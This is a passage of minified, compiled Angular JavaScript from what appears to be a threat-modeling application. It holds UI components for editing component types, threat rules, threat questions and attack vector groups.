"),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",18),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,lft,17,11,"mat-list-item",19),s(16,"\n              "),u(),s(17,"\n            "),u(),s(18,"\n            "),m(19,"div",20),s(20,"\n              "),it(21,"app-threat-rule",34),s(22,"\n            "),u(),s(23,"\n          "),u(),s(24,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedComponentType.Name," ",re(9,12,"general.Threats")," "),C(2),at("matTooltip",re(11,14,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",!0)("canEditName",!0)}}function mft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedQuestion=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),s(1,"\n                    "),m(2,"mat-icon",22),s(3,"arrow_right"),u(),s(4,"\n                    "),m(5,"div",23),s(6),u(),s(7,"\n                    "),m(8,"div",23),s(9),oe(10,"translate"),u(),s(11,"\n                    "),m(12,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(4).DuplicateQuestion(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"content_copy"),u()(),s(16,"\n                    "),m(17,"button",24),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteQuestion(r))}),oe(18,"translate"),m(19,"mat-icon"),s(20,"delete"),u()(),s(21,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedQuestion===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedQuestion===e&&i.theme.IsDarkMode),at("matTooltip",null==e?null:e.Name),C(6),ke(e.Name),C(3),ke(re(10,9,i.GetOptionTypeName(e.OptionType))),C(3),at("matTooltip",re(13,11,"general.Duplicate")),C(5),at("matTooltip",re(18,13,"general.Delete"))}}function uft(t,a){if(1&t&&(bt(0),s(1,"\n                  "),m(2,"div",39),s(3,"\n                    "),it(4,"app-threat-question",40),s(5,"\n                  "),u(),s(6,"\n                "),Mt()),2&t){const e=B(4);C(4),V("threatQuestion",e.selectedQuestion)}}function hft(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"div",14),s(2,"\n              "),m(3,"div",15),s(4,"\n                "),m(5,"mat-list",16),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropQuestion(n,r.GetQuestions()))}),s(6,"\n                  "),m(7,"div",17),s(8),oe(9,"translate"),m(10,"button",36),he("click",function(){return be(e),Me(B(3).AddQuestion())}),oe(11,"translate"),m(12,"mat-icon",37),s(13,"add"),u()()(),s(14,"\n                  "),ne(15,mft,22,15,"mat-list-item",19),s(16,"\n                "),u(),s(17,"\n              "),u(),s(18,"\n              "),m(19,"div",20),s(20,"\n                "),ne(21,uft,7,1,"ng-container",6),s(22,"\n              "),u(),s(23,"\n            "),u(),s(24,"\n          ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ke(re(9,8,"general.ThreatQuestion")),C(2),at("matTooltip",re(11,10,"general.Add")),C(5),V("ngForOf",e.GetQuestions()),C(6),V("ngIf",e.selectedQuestion)}}function fft(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",41),s(2,"\n            "),m(3,"mat-form-field",26),s(4,"\n              "),m(5,"mat-label"),s(6),oe(7,"translate"),u(),s(8,"\n              "),m(9,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.name=n)}),u(),s(10,"\n            "),u(),s(11,"\n            "),it(12,"br"),s(13,"\n            "),m(14,"mat-form-field",26),s(15,"\n              "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n              "),m(20,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.property=n)}),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"mat-checkbox",42),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.threatGen=n)}),s(24,"Threat generated when Property == "),u(),s(25,"\n            "),it(26,"br"),s(27,"\n            "),m(28,"mat-form-field",7),s(29,"\n              "),m(30,"mat-label"),s(31),oe(32,"translate"),u(),s(33,"\n              "),m(34,"input",27),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.question=n)}),u(),s(35,"\n            "),u(),s(36,"\n            "),m(37,"button",43),he("click",function(){return be(e),Me(B(3).AddNewThreat())}),s(38),oe(39,"translate"),u(),s(40,"\n            "),m(41,"mat-checkbox",44),he("ngModelChange",function(n){return be(e),Me(B(3).newThreat.yesResult=n)}),s(42,"Answering the question with Yes sets the property to"),u(),s(43,"\n          "),u(),s(44,"\n        ")}if(2&t){const e=B(3);C(6),ke(re(7,18,"general.Threat")),C(3),at("matTooltip",e.newThreat.name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.name),C(8),ke(re(18,20,"general.Property")),C(3),at("matTooltip",e.newThreat.property),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.property),C(3),V("disabled",""==e.newThreat.property)("ngModel",e.newThreat.threatGen),C(8),ke(re(32,22,"properties.Question")),C(3),at("matTooltip",e.newThreat.question),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.newThreat.question),C(3),V("disabled",""==e.newThreat.name||""==e.newThreat.question),C(1),ke(re(39,24,"general.Add")),C(3),V("disabled",""==e.newThreat.property)("ngModel",e.newThreat.yesResult)}}function pft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",7),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",8),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-checkbox",9),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.IsActive=n)}),s(12),oe(13,"translate"),u(),s(14,"\n    "),m(15,"mat-checkbox",10),he("ngModelChange",function(n){return be(e),Me(B(2).selectedComponentType.IsThirdParty=n)}),s(16),oe(17,"translate"),u(),s(18,"\n    \n    "),m(19,"mat-tab-group",11),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(20,"\n      "),m(21,"mat-tab",12),oe(22,"translate"),s(23,"\n          "),ne(24,rft,25,13,"ng-template",13),s(25,"\n      "),u(),s(26,"\n      "),m(27,"mat-tab",12),oe(28,"translate"),s(29,"\n        "),ne(30,dft,25,16,"ng-template",13),s(31,"\n      "),u(),s(32,"\n      "),m(33,"mat-tab",12),oe(34,"translate"),s(35,"\n          "),ne(36,hft,25,12,"ng-template",13),s(37,"\n      "),u(),s(38,"\n      "),m(39,"mat-tab",12),oe(40,"translate"),s(41,"\n        "),ne(42,fft,45,26,"ng-template",13),s(43,"\n    "),u(),s(44,"\n    "),u(),s(45,"\n  "),Mt()}if(2&t){const e=B(2);let i;C(5),ke(re(6,15,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedComponentType.Description),C(3),V("ngModel",e.selectedComponentType.IsActive),C(1),ke(re(13,17,"properties.IsActive")),C(3),V("ngModel",e.selectedComponentType.IsThirdParty),C(1),ke(re(17,19,"properties.IsThirdParty")),C(3),V("selectedIndex",e.GetSelectedTabIndex()),C(2),$c("label","",re(22,21,"general.Properties")," (",null==e.selectedComponentType||null==e.selectedComponentType.Properties?null:e.selectedComponentType.Properties.length,")"),C(6),$c("label","",re(28,23,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),C(6),$c("label","",re(34,25,"properties.Questions")," (",null==(i=e.GetQuestions())?null:i.length,")"),C(6),at("label",re(40,27,"general.Wizard"))}}function _ft(t,a){if(1&t&&(m(0,"div",5),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,pft,46,29,"ng-container",6),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedComponentType)}}function gft(t,a){if(1&t&&(m(0,"span",47),s(1),oe(2,"translate"),u()),2&t){const e=B(2).item;C(1),ke(re(2,1,e.DisplayName))}}function Cft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,gft,3,3,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpProperty(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownProperty(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function yft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.Name)}}function bft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,yft,2,1,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpThreatRule(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownThreatRule(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Mft(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.Name)}}function vft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Mft,2,1,"span",45),s(3," \n      "),m(4,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveUpQuestion(n))}),s(5,"\n        "),m(6,"mat-icon"),s(7,"arrow_upward"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",46),he("click",function(){be(e);const n=B().item;return Me(B().OnMoveDownQuestion(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"arrow_downward"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B().item;C(2),V("ngIf",e),C(8),ke(re(11,3,"nav-tree.moveUp")),C(10),ke(re(21,5,"nav-tree.moveDown"))}}function Aft(t,a){if(1&t&&(s(0,"\n    "),ne(1,Cft,24,7,"ng-container",6),s(2,"\n    "),ne(3,bft,24,7,"ng-container",6),s(4,"\n    "),ne(5,vft,24,7,"ng-container",6),s(6,"\n  ")),2&t){const e=a.item,i=B();C(1),V("ngIf",i.IsProperty(e)),C(2),V("ngIf",i.IsThreatRule(e)),C(2),V("ngIf",i.IsThreatQuestion(e))}}let Tft=(()=>{class t extends xa{constructor(e,i,n,r,c){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,this.locStorage=c,this.newThreat={name:"",question:"",property:"",threatGen:!1,yesResult:!0},this.menuTopLeftPosition={x:"0",y:"0"},i.ConfigChanged.subscribe(d=>this.createNodes())}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.selectedQuestion=null,this.selectedProperty=null,this.selectedThreatRule=null}get selectedComponentType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.data}get typeThreats(){return this.selectedComponentType?this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.ComponentRestriction)||void 0===i?void 0:i.componentTypeID)==this.selectedComponentType.ID}):[]}get selectedQuestion(){return this._selectedQuestion}set selectedQuestion(e){this._selectedQuestion=e}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}IsProperty(e){return"DisplayName"in e&&"ID"in e}IsThreatRule(e){return e instanceof Vp}IsThreatQuestion(e){return e instanceof iM}OnMoveUpProperty(e){let i=this.selectedComponentType.Properties;if(0!=i.findIndex(n=>n.ID==e.ID)){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n-1,1)[0])}}OnMoveDownProperty(e){let i=this.selectedComponentType.Properties;if(i.findIndex(n=>n.ID==e.ID)!=i.length-1){let n=i.findIndex(r=>r.ID==e.ID);i.splice(n,0,i.splice(n+1,1)[0])}}OnMoveUpThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveDownThreatRule(e){let i=this.dataService.Config.GetThreatRules(),n=this.typeThreats,r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatRules(c,d)}}OnMoveUpQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(0!=r){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r-1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}OnMoveDownQuestion(e){let i=this.dataService.Config.GetThreatQuestions(),n=this.GetQuestions(),r=n.findIndex(c=>c.ID==e.ID);if(r!=n.length-1){const c=i.findIndex(T=>T.ID==e.ID),d=i.findIndex(T=>T.ID==n[r+1].ID);this.dataService.Config.MoveItemInThreatQuestions(c,d)}}AddProperty(){let e=[];e.push(...this.selectedComponentType.Properties.map(n=>n.DisplayName));let i=Gi.FindUniqueName("New Property",e);this.selectedComponentType.Properties.push({DisplayName:i,ID:Fo(),Tooltip:"",HasGetter:!1,Editable:!0,Type:Ii.CheckBox}),this.selectedProperty=this.selectedComponentType.Properties[this.selectedComponentType.Properties.length-1]}DeleteProperty(e){let i=this.selectedComponentType.Properties.indexOf(e);i>=0&&this.selectedComponentType.Properties.splice(i,1)}GetElementPropertyValue(e){let i=e.DefaultValue;return e.Type==Ii.ProtocolSelect?"[ ]":e.Type==Ii.LowMediumHighSelect?An.ToString(i):i}GetPropertyTypes(){return bG.GetMappableTypeNames()}AddThreat(){let e=this.dataService.Config.CreateThreatRule(this.dataService.Config.ComponentThreatRuleGroups,on.Component);e.ComponentRestriction.componentTypeID=this.selectedComponentType.ID,e.Name=Gi.FindUniqueName(this.selectedComponentType.Name,this.dataService.Config.GetThreatRules().map(i=>i.Name)),this.selectedThreatRule=e}DeleteThreat(e){this.dataService.Config.DeleteThreatRule(e),e==this.selectedThreatRule&&(this.selectedThreatRule=null)}GetComponentRestrictionsCount(e){var i;let n=0;return!(null===(i=e.ComponentRestriction)||void 0===i)&&i.DetailRestrictions&&e.ComponentRestriction.DetailRestrictions.forEach(r=>{(r.RestType==ya.Property&&r.PropertyRest||r.RestType==ya.PhysicalElement&&r.PhyElementRest)&&(n+=1)}),n}AddQuestion(){let e=this.dataService.Config.CreateThreatQuestion();return e.ComponentType=this.selectedComponentType,this.selectedQuestion=e,e}DuplicateQuestion(e){let i=this.AddQuestion();i.CopyFrom(e.Data),i.Name+="-Copy"}DeleteQuestion(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Config.DeleteThreatQuestion(e),this.selectedQuestion=null)})}AddNewThreat(){var e;this.AddThreat(),this.selectedThreatRule.Name=this.newThreat.name,this.AddQuestion(),this.selectedQuestion.Name=this.newThreat.name,this.selectedQuestion.Question=this.newThreat.question,(null===(e=this.newThreat.property)||void 0===e?void 0:e.length)>0&&(this.AddProperty(),this.selectedProperty.DisplayName=this.newThreat.property,this.selectedProperty.Tooltip=this.newThreat.question,this.selectedThreatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:this.selectedProperty.ID,ComparisonType:cc.Equals,Value:this.newThreat.threatGen}}),this.selectedQuestion.Property=this.selectedProperty,this.newThreat.yesResult||(this.selectedQuestion.ChangesPerOption["general.Yes"].Value=!1,this.selectedQuestion.ChangesPerOption["general.No"].Value=!0)),this.newThreat={name:"",property:"",question:"",threatGen:!1,yesResult:!0}}GetQuestions(){return this.dataService.Config.GetThreatQuestions().filter(e=>e.ComponentType==this.selectedComponentType)}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}dropThreat(e,i){const n=this.dataService.Config.GetThreatRules().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatRules().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatRules(n,r)}dropQuestion(e,i){const n=this.dataService.Config.GetThreatQuestions().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetThreatQuestions().indexOf(i[e.currentIndex]);this.dataService.Config.MoveItemInThreatQuestions(n,r)}GetOptionTypeName(e){return Pl.ToString(e)}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_CONFIG_COMPONENTS_TAB_INDEX,e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteMyComponentType(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.myComponentTypeIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.myComponentTypeIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="myComponentTypeIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=(c,d)=>{let T={name:()=>c.Name,canSelect:!1,data:c,canAdd:!0,onAdd:()=>{let k=this.dataService.Config.CreateMyComponentType(c);k.ComponentTypeID=this.componentType,k.IsActive=!0,this.createNodes(),this.selectedNode=this.FindNodeOfObject(k),this.selectedNode.isRenaming=!0},canRename:!0,onRename:k=>{c.Name=k},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(k=>{k&&(this.dataService.Config.DeleteMyComponentTypeGroup(c),this.selectedNode==T&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(0!=k.findIndex(q=>q.ID==c.ID)){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q-1,1)[0]),d.children.splice(q,0,d.children.splice(q-1,1)[0])}},onMoveDown:()=>{let k=this.dataService.Config.GetMyComponentTypeGroups(c.ComponentTypeID);if(k.findIndex(q=>q.ID==c.ID)!=k.length-1){let q=k.findIndex(Y=>Y.ID==c.ID);k.splice(q,0,k.splice(q+1,1)[0]),d.children.splice(q,0,d.children.splice(q+1,1)[0])}}};return T},r={name:()=>this.translate.instant("pages.config."+(this.componentType==zr.Software?"Software":"Process")+"Components"),canSelect:!1,icon:this.componentType==zr.Software?"code":"policy",canAdd:!0,hasMenu:!0,onAdd:()=>{let c=this.dataService.Config.CreateMyComponentTypeGroup(this.componentType);this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config&&this.dataService.Config.GetMyComponentTypeGroups(this.componentType).forEach(c=>{let d=n(c,r);c.Types.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-components"]],viewQuery:function(e,i){if(1&e&&Mi(tft,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode",componentType:"componentType"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["color","primary",2,"margin-left","15px",3,"ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"node","threatRule","canEdit","canEditName"],["mat-line","",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","15px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],[2,"margin","10px 0 0 10px"],[3,"threatQuestion"],[2,"margin-top","10px"],["color","primary","labelPosition","before",2,"margin-left","10px",3,"disabled","ngModel","ngModelChange"],["mat-raised-button","",2,"float","right","margin-right","5px",3,"disabled","click"],["color","primary","labelPosition","before",3,"disabled","ngModel","ngModelChange"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,_ft,7,2,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n  "),ne(8,Aft,7,3,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);V("ngIf",i.selectedNode),C(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,br,da,nn,un,jr,Nr,yr,qh,Mu,Uh,Go,Xa,es,ts,Or,Lr,rc,Xo,qo,po,Zc,Pa,Gp,EZ,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function Eft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",4),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(B(2).selectedAttackVectorGroup.Description=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedAttackVectorGroup.Description)}}function Dft(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),ne(5,Eft,11,5,"ng-container",2),s(6,"\n  "),it(7,"app-attack-vector",3),s(8,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("ngIf",e.selectedAttackVectorGroup),C(2),V("attackVector",e.selectedAttackVector)}}let xft=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedAttackVectorGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof tM?this.selectedNode.data:null}get selectedAttackVector(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Wp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canRename:!0,onRename:te=>{d.Name=te},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(d).subscribe(te=>{te&&(this.dataService.Config.DeleteAttackVector(d),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let te=this.dataService.Config.CreateAttackVector(T);te.CopyFrom(d.Data),te.Name=te.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(te),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let te=T.Data.attackVectorIDs;if(0!=te.findIndex(pe=>pe==d.ID)){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe-1,1)[0]),k.children.splice(pe,0,k.children.splice(pe-1,1)[0])}},onMoveDown:()=>{let te=T.Data.attackVectorIDs;if(te.findIndex(pe=>pe==d.ID)!=te.length-1){let pe=te.findIndex(Re=>Re==d.ID);te.splice(pe,0,te.splice(pe+1,1)[0]),k.children.splice(pe,0,k.children.splice(pe+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>q.filter(te=>te!=k),onMoveToGroup:te=>{let pe="attackVectorIDs";T.Data[pe].splice(T.Data[pe].indexOf(d.ID),1),te.data.Data[pe].push(d.ID),this.createNodes()}};return Y},n=(d,T,k,q)=>{let Y={name:()=>d.Name,canSelect:!0,data:d,canAdd:!0,addOptions:[this.translate.instant("general.Group"),this.translate.instant("general.AttackVector")],onAdd:te=>{let 